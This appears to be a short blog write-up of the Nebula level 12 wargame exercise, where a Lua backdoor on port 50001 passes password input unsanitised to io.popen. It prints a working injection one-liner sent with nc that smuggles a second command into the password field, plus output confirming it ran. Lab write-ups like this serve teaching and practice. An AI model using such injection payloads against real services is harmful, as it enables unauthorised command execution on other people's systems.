"Whatever Pages"

20xx-A1-Injection

         Nebula 12 Agenda: “There is a backdoor process listening on port 50001”


This one is pretty easy, it contains injection flaw. The vulnerability arises when a naked unhandled input string falls into “hash” function as an “password” argument. io.popen lua facility starts command sequence in a separated process, thereby we can provide injection:

1 level12@nebula:~$ echo "0; getflag > /tmp/flag; echo 0" | nc localhost 50001
2 Password: Better luck next time
3 level12@nebula:~$ cat /tmp/flag 
4 You have successfully executed getflag on a target account

As well, in this manner we didn’t break the execution chain. “Voila”!